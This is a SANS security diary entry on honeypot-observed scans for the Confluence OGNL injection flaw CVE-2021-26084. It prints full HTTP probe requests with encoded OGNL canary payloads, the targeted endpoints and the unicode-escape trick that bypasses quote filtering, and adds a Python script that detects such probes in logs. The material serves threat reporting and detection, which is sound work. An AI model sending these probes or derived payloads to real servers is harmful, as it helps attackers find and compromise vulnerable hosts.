
Internet Wide Scan Fingerprinting Confluence Servers

Published: 2023-02-22. Last Updated: 2023-02-22 13:54:55 UTC
by Johannes Ullrich (Version: 1)

Looking over some of our honeypot logs today, I noticed one IP address, 60.223.74.99, scanning for several older Confluence vulnerabilities.

Confluence is the collaboration component of Atlassian's suite of developer tools [1]. Attacks against developers, and the tools they are using, are on the rise in general, and this is yet another "piece to the puzzle." A quick search using NIST's NVD shows 18 vulnerabilities in Confluence [2].

The scans use a known PoC exploit for CVE-2021-26084, an OGNL injection vulnerability in Confluence Server and Data Center [3].

Here are two sample requests sent by the attacker:

POST /users/user-dark-features HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb


POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb


All endpoints hit by the attacker:

/confluence/pages/createpage-entervariables.action
/confluence/pages/createpage-entervariables.action?SpaceKey=x
/pages/createpage.action?spaceKey=myproj
/pages/createpage-entervariables.action
/pages/createpage-entervariables.action?SpaceKey=x
/pages/doenterpagevariables.action
/pages/templates2/viewpagetemplate.action
/template/custom/content-editor
/templates/editor-preload-container
/users/user-dark-features
/wiki/pages/createpage-entervariables.action
/wiki/pages/createpage-entervariables.action?SpaceKey=x

The payload string URL-decodes to:

aaaa\u0027+{506*5210}+\u0027bbb

The %5Cu0027 sequences are not decoded by the web server: they arrive as literal \u0027 unicode escapes, which get past the filtering of the raw single quote but are turned into ' by the OGNL parser. The string literal is therefore closed, {506*5210} is evaluated as an OGNL expression, and the result (2636260) is concatenated back into the string.

The likely goal is to have the server reflect the product in its response. If it does, the host evaluated attacker-supplied OGNL and is vulnerable; the scanner can then come back with a real payload.
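As an added example (not code from the diary, and not the PoC linked as [3]), the Python below decodes the queryString canary the way the diary describes, recovers the two operands and the product the scanner expects back, and runs that check over a few honeypot-style records, normalising the /wiki and /confluence context-path variants from the endpoint list so they match the same rules. The sample records and their response bodies are constructed for this illustration; the "product reflected in the response" test follows the check described above.

```python
import re
from urllib.parse import unquote_plus

# Endpoints from the diary's list, without the /confluence and /wiki
# context-path prefixes (those are normalised away in scan_records).
PROBED_PATHS = {
    "/pages/createpage-entervariables.action",
    "/pages/createpage.action",
    "/pages/doenterpagevariables.action",
    "/pages/templates2/viewpagetemplate.action",
    "/template/custom/content-editor",
    "/templates/editor-preload-container",
    "/users/user-dark-features",
}

# The arithmetic canary after URL-decoding: \u0027+{A*B}+\u0027
PROBE_RE = re.compile(r"\\u0027\+\{(\d+)\*(\d+)\}\+\\u0027")


def decode_payload(body):
    # URL-decode the form body, then emulate the unicode-escape step the
    # OGNL parser performs, so the result reads the way OGNL sees it:
    #   queryString=aaaa'+{506*5210}+'bbb
    raw = unquote_plus(body)
    return raw.replace("\\u0027", "'")


def extract_probe(body):
    # Return (a, b, a*b) if the body carries the math canary, else None.
    m = PROBE_RE.search(unquote_plus(body))
    if not m:
        return None
    a, b = int(m.group(1)), int(m.group(2))
    return a, b, a * b


def normalise_path(path):
    # Drop the query string and the context-path variants seen in the scan.
    path = path.split("?", 1)[0]
    for prefix in ("/confluence", "/wiki"):
        if path.startswith(prefix + "/"):
            path = path[len(prefix):]
    return path


def scan_records(records):
    # records: dicts with 'path', 'body' and (optionally) 'response'.
    # A finding is emitted for every request carrying the canary; 'evaluated'
    # is True when the expected product shows up in the response, i.e. the
    # server executed the injected OGNL expression.
    findings = []
    for rec in records:
        probe = extract_probe(rec.get("body", ""))
        if probe is None:
            continue
        a, b, expected = probe
        path = normalise_path(rec["path"])
        findings.append({
            "path": path,
            "known_endpoint": path in PROBED_PATHS,
            "expression": f"{a}*{b}",
            "expected": expected,
            "evaluated": str(expected) in rec.get("response", ""),
        })
    return findings


# Constructed sample records. The request bodies are the two from the diary;
# the response bodies are made up to show a patched host (echoes the input
# verbatim) next to an unpatched one (reflects the evaluated product).
SAMPLE_RECORDS = [
    {"path": "/users/user-dark-features",
     "body": "queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb",
     "response": 'value="aaaa\\u0027+{506*5210}+\\u0027bbb"'},
    {"path": "/wiki/pages/createpage-entervariables.action?SpaceKey=x",
     "body": "queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb",
     "response": 'value="aaaa31804304bbb"'},
    {"path": "/login.action",
     "body": "os_username=admin&os_password=x",
     "response": ""},
]

if __name__ == "__main__":
    for finding in scan_records(SAMPLE_RECORDS):
        print(finding)
```

Run against real honeypot or reverse-proxy logs, the interesting signal is a canary on any endpoint, not only the listed ones; the endpoint list is what this particular scanner used, while the PROBE_RE pattern is what identifies the CVE-2021-26084 probe itself.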

No scans were seen from that source IP until today. It appears to be an otherwise unremarkable address in a China Unicom consumer range, possibly a CGNAT address shared by many subscribers.


[1] https://www.atlassian.com/software/confluence
[2] https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=cpe%3A2.3%3Aa%3Aatlassian%3Aconfluence_data_center&search_type=all&isCpeNameSearch=false
[3] https://github.com/alt3kx/CVE-2021-26084_PoC


---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Comments

Suggest the keyword spelling be corrected to Atlassian (two ‘s’) for accuracy.

Perhaps this is a follow up scan to the recent Atlassian breach?
This old script might have been used in this scan: https://blog.csdn.net/haoaaao/article/details/124542619
Same UA, same headers, same pages targeted, same query.
